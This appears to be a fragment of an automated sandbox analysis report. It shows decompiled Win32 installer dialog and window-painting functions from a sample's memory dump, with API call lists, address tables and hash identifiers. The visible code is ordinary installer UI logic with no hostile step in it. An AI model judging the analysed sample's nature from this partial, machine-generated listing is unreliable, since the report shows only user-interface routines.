							_push(0xfffffc1b);
							E00403E54(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E54(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423fcc - _t133;
							_v32 = _t49;
							if( *0x423fcc != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403E76(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f4f8, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423fcc - _t133;
							if( *0x423fcc == _t133) {
								_push( *0x420530);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f4f8);
							}
							E00403E89();
							E00405B98(0x420538, 0x423740);
							E00405BBA(0x420538, _t125, _t130,  &(0x420538[lstrlenA(0x420538)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420538);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423718);
									 *0x41fd08 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423f40,  *_t130 +  *0x423720 & 0x0000ffff, _t125,  *(0x4091b0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423718 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E54(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423718, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42370c - _t133;
									if( *0x42370c != _t133) {
										goto L61;
									}
									ShowWindow( *0x423718, 8);
									E00403EA0(0x405);
									goto L58;
								}
								__eflags =  *0x423fcc - _t133;
								if( *0x423fcc != _t133) {
									goto L61;
								}
								__eflags =  *0x423fc0 - _t133;
								if( *0x423fc0 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423718);
						 *0x423f48 = _t133;
						EndDialog(_t125,  *0x41f900);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423718, 0x40f, 0, 1);
						__eflags =  *0x42370c;
						return 0 |  *0x42370c == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420510, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420510,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403EBB(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423718, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423fcc - _t133;
										if( *0x423fcc == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f900 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E2D();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f900 = _t127;
										goto L21;
									}
									__eflags =  *0x4091ac - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423718);
						 *0x423718 = _a12;
						L58:
						if( *0x421538 == _t133 &&  *0x423718 != _t133) {
							ShowWindow(_t125, 0xa);
							 *0x421538 = 1;
						}
						L61:
						return 0;
					}
				}
			}






























                                                                                                                    0x0040398a
                                                                                                                    0x00403993
                                                                                                                    0x00403ad4
                                                                                                                    0x00403ad8
                                                                                                                    0x00403adc
                                                                                                                    0x00403ade
                                                                                                                    0x00403ae3
                                                                                                                    0x00403aee
                                                                                                                    0x00403af9
                                                                                                                    0x00403afe
                                                                                                                    0x00403b00
                                                                                                                    0x00403b02
                                                                                                                    0x00403b05
                                                                                                                    0x00403b0a
                                                                                                                    0x00403b18
                                                                                                                    0x00403b25
                                                                                                                    0x00403b2c
                                                                                                                    0x00403b2c
                                                                                                                    0x00403b2d
                                                                                                                    0x00403b2d
                                                                                                                    0x00403b32
                                                                                                                    0x00403b38
                                                                                                                    0x00403b3f
                                                                                                                    0x00403b45
                                                                                                                    0x00403b47
                                                                                                                    0x00403b87
                                                                                                                    0x00403b8c
                                                                                                                    0x00403b91
                                                                                                                    0x00403b91
                                                                                                                    0x00403b96
                                                                                                                    0x00403b9f
                                                                                                                    0x00403ba1
                                                                                                                    0x00403ba6
                                                                                                                    0x00403bac
                                                                                                                    0x00403bb0
                                                                                                                    0x00403bb0
                                                                                                                    0x00403bb5
                                                                                                                    0x00403bbb
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00403bc6
                                                                                                                    0x00403bcc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00403bd5
                                                                                                                    0x00403bdd
                                                                                                                    0x00403be2
                                                                                                                    0x00403be5
                                                                                                                    0x00403beb
                                                                                                                    0x00403bf0
                                                                                                                    0x00403bf3
                                                                                                                    0x00403bf9
                                                                                                                    0x00403bfe
                                                                                                                    0x00403c01
                                                                                                                    0x00403c07
                                                                                                                    0x00403c0f
                                                                                                                    0x00403c15
                                                                                                                    0x00403c1b
                                                                                                                    0x00403c1f
                                                                                                                    0x00403c26
                                                                                                                    0x00403c26
                                                                                                                    0x00403c26
                                                                                                                    0x00403c30
                                                                                                                    0x00403c42
                                                                                                                    0x00403c4e
                                                                                                                    0x00403c53
                                                                                                                    0x00403c5d
                                                                                                                    0x00403c63
                                                                                                                    0x00403c65
                                                                                                                    0x00403c6a
                                                                                                                    0x00403c67
                                                                                                                    0x00403c67
                                                                                                                    0x00403c67
                                                                                                                    0x00403c7a
                                                                                                                    0x00403c92
                                                                                                                    0x00403c94
                                                                                                                    0x00403c9a
                                                                                                                    0x00403caf
                                                                                                                    0x00403c9c
                                                                                                                    0x00403ca5
                                                                                                                    0x00403ca7
                                                                                                                    0x00403ca7
                                                                                                                    0x00403cb5
                                                                                                                    0x00403cc5
                                                                                                                    0x00403cd6
                                                                                                                    0x00403cdd
                                                                                                                    0x00403ce3
                                                                                                                    0x00403ce7
                                                                                                                    0x00403cec
                                                                                                                    0x00403cee
                                                                                                                    0x00000000
                                                                                                                    0x00403cf4
                                                                                                                    0x00403cf4
                                                                                                                    0x00403cf6
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00403cfc
                                                                                                                    0x00403d00
                                                                                                                    0x00403d25
                                                                                                                    0x00403d2b
                                                                                                                    0x00403d31
                                                                                                                    0x00403d33
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00403d59
                                                                                                                    0x00403d5f
                                                                                                                    0x00403d61
                                                                                                                    0x00403d66
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00403d6c
                                                                                                                    0x00403d6f
                                                                                                                    0x00403d72
                                                                                                                    0x00403d89
                                                                                                                    0x00403d95
                                                                                                                    0x00403dae
                                                                                                                    0x00403db4
                                                                                                                    0x00403db8
                                                                                                                    0x00403dbd
                                                                                                                    0x00403dc3
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00403dcd
                                                                                                                    0x00403dd8
                                                                                                                    0x00000000
                                                                                                                    0x00403dd8
                                                                                                                    0x00403d02
                                                                                                                    0x00403d08
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00403d0e
                                                                                                                    0x00403d14
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00403d1a
                                                                                                                    0x00403cee
                                                                                                                    0x00403de5
                                                                                                                    0x00403df1
                                                                                                                    0x00403df8
                                                                                                                    0x00000000
                                                                                                                    0x00403b49
                                                                                                                    0x00403b49
                                                                                                                    0x00403b4c
                                                                                                                    0x00403b7f
                                                                                                                    0x00403b7f
                                                                                                                    0x00403b81
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00403b81
                                                                                                                    0x00403b4e
                                                                                                                    0x00403b52
                                                                                                                    0x00403b57
                                                                                                                    0x00403b59
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00403b69
                                                                                                                    0x00403b71
                                                                                                                    0x00000000
                                                                                                                    0x00403b77
                                                                                                                    0x004039a5
                                                                                                                    0x004039a5
                                                                                                                    0x004039a9
                                                                                                                    0x004039ae
                                                                                                                    0x004039bd
                                                                                                                    0x004039bd
                                                                                                                    0x004039c6
                                                                                                                    0x004039cf
                                                                                                                    0x004039da
                                                                                                                    0x004039da
                                                                                                                    0x004039e6
                                                                                                                    0x00403a02
                                                                                                                    0x00403a05
                                                                                                                    0x00403a18
                                                                                                                    0x00403a1e
                                                                                                                    0x00403ac1
                                                                                                                    0x00000000
                                                                                                                    0x00403aca
                                                                                                                    0x00403a24
                                                                                                                    0x00403a31
                                                                                                                    0x00403a33
                                                                                                                    0x00403a35
                                                                                                                    0x00403a54
                                                                                                                    0x00403a54
                                                                                                                    0x00403a57
                                                                                                                    0x00403a5c
                                                                                                                    0x00403a5f
                                                                                                                    0x00403a6f
                                                                                                                    0x00403a70
                                                                                                                    0x00403a72
                                                                                                                    0x00403aa8
                                                                                                                    0x00403abb
                                                                                                                    0x00000000
                                                                                                                    0x00403abb
                                                                                                                    0x00403a74
                                                                                                                    0x00403a7a
                                                                                                                    0x00403a93
                                                                                                                    0x00403a98
                                                                                                                    0x00403a9a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00403a9c
                                                                                                                    0x00403a88
                                                                                                                    0x00403a88
                                                                                                                    0x00403a8a
                                                                                                                    0x00403a8a
                                                                                                                    0x00000000
                                                                                                                    0x00403a8a
                                                                                                                    0x00403a7d
                                                                                                                    0x00403a82
                                                                                                                    0x00000000
                                                                                                                    0x00403a82
                                                                                                                    0x00403a61
                                                                                                                    0x00403a67
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00403a69
                                                                                                                    0x00000000
                                                                                                                    0x00403a69
                                                                                                                    0x00403a59
                                                                                                                    0x00000000
                                                                                                                    0x00403a59
                                                                                                                    0x00403a3f
                                                                                                                    0x00403a46
                                                                                                                    0x00403a4c
                                                                                                                    0x00403a4e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00403a4e
                                                                                                                    0x00403a0a
                                                                                                                    0x00000000
                                                                                                                    0x004039e8
                                                                                                                    0x004039ee
                                                                                                                    0x004039f8
                                                                                                                    0x00403dfe
                                                                                                                    0x00403e04
                                                                                                                    0x00403e11
                                                                                                                    0x00403e17
                                                                                                                    0x00403e17
                                                                                                                    0x00403e21
                                                                                                                    0x00000000
                                                                                                                    0x00403e21
                                                                                                                    0x004039e6

                                                                                                                    APIs
                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039BD
                                                                                                                    • ShowWindow.USER32(?), ref: 004039DA
                                                                                                                    • DestroyWindow.USER32 ref: 004039EE
                                                                                                                    • SetWindowLongA.USER32 ref: 00403A0A
                                                                                                                    • GetDlgItem.USER32 ref: 00403A2B
                                                                                                                    • SendMessageA.USER32 ref: 00403A3F
                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403A46
                                                                                                                    • GetDlgItem.USER32 ref: 00403AF4
                                                                                                                    • GetDlgItem.USER32 ref: 00403AFE
                                                                                                                    • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403B18
                                                                                                                    • SendMessageA.USER32 ref: 00403B69
                                                                                                                    • GetDlgItem.USER32 ref: 00403C0F
                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 00403C30
                                                                                                                    • EnableWindow.USER32(?,?), ref: 00403C42
                                                                                                                    • EnableWindow.USER32(?,?), ref: 00403C5D
                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C73
                                                                                                                    • EnableMenuItem.USER32 ref: 00403C7A
                                                                                                                    • SendMessageA.USER32 ref: 00403C92
                                                                                                                    • SendMessageA.USER32 ref: 00403CA5
                                                                                                                    • lstrlenA.KERNEL32(00420538,?,00420538,00423740), ref: 00403CCE
                                                                                                                    • SetWindowTextA.USER32(?,00420538), ref: 00403CDD
                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 00403E11
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 184305955-0
                                                                                                                    • Opcode ID: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                                                                                                                    • Instruction ID: 5fd13e9e65c650ae90d185cc2d11acb2e8fe01e0af56b63b73109b0399f4b85d
                                                                                                                    • Opcode Fuzzy Hash: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                                                                                                                    • Instruction Fuzzy Hash: EFC1CF71A04201BBDB20AF61ED85D2B7EBCEB4470AB40453EF541B51E1C73DAA429F5E
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00403F9C, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 93%
                                                                                                                    			E00403F9C(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420518 =  *0x420518 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403EBB(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422ee0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422ee0
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423f48, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423f48, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420518 != 0) {
						goto L25;
					} else {
						_t112 =  *0x41fd08 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403E76(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404227();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x42371c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x423f78;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F68;
				E00403E54(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E54(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403E76( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403E89(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x423f50 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f4fc =  *0x41f4fc & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420518 =  *0x420518 & 0x00000000;
				return 0;
			}

















                                                                                                                    0x00403fac
                                                                                                                    0x004040d2
                                                                                                                    0x0040412e
                                                                                                                    0x00404132
                                                                                                                    0x00404209
                                                                                                                    0x0040420b
                                                                                                                    0x0040420b
                                                                                                                    0x00404211
                                                                                                                    0x00404211
                                                                                                                    0x00404214
                                                                                                                    0x00000000
                                                                                                                    0x0040421b
                                                                                                                    0x00404140
                                                                                                                    0x00404142
                                                                                                                    0x0040414c
                                                                                                                    0x00404157
                                                                                                                    0x0040415a
                                                                                                                    0x0040415d
                                                                                                                    0x00404168
                                                                                                                    0x0040416b
                                                                                                                    0x00404172
                                                                                                                    0x00404180
                                                                                                                    0x00404198
                                                                                                                    0x004041a0
                                                                                                                    0x004041ab
                                                                                                                    0x004041bb
                                                                                                                    0x004041bd
                                                                                                                    0x004041bd
                                                                                                                    0x00404172
                                                                                                                    0x004041c7
                                                                                                                    0x00000000
                                                                                                                    0x004041d2
                                                                                                                    0x004041d6
                                                                                                                    0x004041e7
                                                                                                                    0x004041e7
                                                                                                                    0x004041ed
                                                                                                                    0x004041fb
                                                                                                                    0x004041fb
                                                                                                                    0x00000000
                                                                                                                    0x004041ff
                                                                                                                    0x004041c7
                                                                                                                    0x004040dd
                                                                                                                    0x00000000
                                                                                                                    0x004040f1
                                                                                                                    0x004040f7
                                                                                                                    0x004040fd
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00404122
                                                                                                                    0x00404124
                                                                                                                    0x00404129
                                                                                                                    0x00000000
                                                                                                                    0x00404129
                                                                                                                    0x004040dd
                                                                                                                    0x00403fb2
                                                                                                                    0x00403fb5
                                                                                                                    0x00403fba
                                                                                                                    0x00403fcb
                                                                                                                    0x00403fcb
                                                                                                                    0x00403fd2
                                                                                                                    0x00403fd5
                                                                                                                    0x00403fd7
                                                                                                                    0x00403fdc
                                                                                                                    0x00403fe5
                                                                                                                    0x00403feb
                                                                                                                    0x00403ff7
                                                                                                                    0x00403ffa
                                                                                                                    0x00404003
                                                                                                                    0x00404008
                                                                                                                    0x0040400b
                                                                                                                    0x00404010
                                                                                                                    0x00404027
                                                                                                                    0x0040402e
                                                                                                                    0x00404041
                                                                                                                    0x00404044
                                                                                                                    0x00404059
                                                                                                                    0x00404060
                                                                                                                    0x00404065
                                                                                                                    0x0040406a
                                                                                                                    0x0040406a
                                                                                                                    0x00404079
                                                                                                                    0x00404088
                                                                                                                    0x0040408a
                                                                                                                    0x004040a0
                                                                                                                    0x004040af
                                                                                                                    0x004040b1
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                    • String ID: N$open$.B
                                                                                                                    • API String ID: 3615053054-720656042
                                                                                                                    • Opcode ID: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                                                                                                                    • Instruction ID: d52f05746bbb3f3b1d606d9c91532631e65720296560e4ea5c31ec00add49965
                                                                                                                    • Opcode Fuzzy Hash: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                                                                                                                    • Instruction Fuzzy Hash: 0161D571A40309BBEB109F60DD45F6A7B69FB54715F108036FB04BA2D1C7B8AA51CF98
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 90%
                                                                                                                    			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423f50;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x423740, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x423f48;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                                                                                    0x0040100a
                                                                                                                    0x00401039
                                                                                                                    0x00401047
                                                                                                                    0x0040104d
                                                                                                                    0x00401051
                                                                                                                    0x0040105b
                                                                                                                    0x00401061
                                                                                                                    0x00401064
                                                                                                                    0x004010f3
                                                                                                                    0x00401089
                                                                                                                    0x0040108c
                                                                                                                    0x004010a6
                                                                                                                    0x004010bd
                                                                                                                    0x004010cc
                                                                                                                    0x004010cf
                                                                                                                    0x004010d5
                                                                                                                    0x004010d9
                                                                                                                    0x004010e4
                                                                                                                    0x004010ed
                                                                                                                    0x004010ef
                                                                                                                    0x004010ef
                                                                                                                    0x00401100
                                                                                                                    0x00401105
                                                                                                                    0x0040110d
                                                                                                                    0x00401110
                                                                                                                    0x00401112
                                                                                                                    0x00401118
                                                                                                                    0x0040111f
                                                                                                                    0x00401126
                                                                                                                    0x00401130
                                                                                                                    0x00401142
                                                                                                                    0x00401156
                                                                                                                    0x00401160
                                                                                                                    0x00401165
                                                                                                                    0x00401165
                                                                                                                    0x00401110
                                                                                                                    0x0040116e
                                                                                                                    0x00000000
                                                                                                                    0x00401178
                                                                                                                    0x00401010
                                                                                                                    0x00401013
                                                                                                                    0x00401015
                                                                                                                    0x0040101f
                                                                                                                    0x0040101f
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                    • GetClientRect.USER32 ref: 0040105B
                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                    • FillRect.USER32 ref: 004010E4
                                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                    • DrawTextA.USER32(00000000,00423740,000000FF,00000010,00000820), ref: 00401156
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                    • String ID: F
                                                                                                                    • API String ID: 941294808-1304234792
                                                                                                                    • Opcode ID: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                                                                                                                    • Instruction ID: 81ce27436f0092abe3ce3185f2c65b9207eacd25275343976a1476a18aae1cf1
                                                                                                                    • Opcode Fuzzy Hash: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
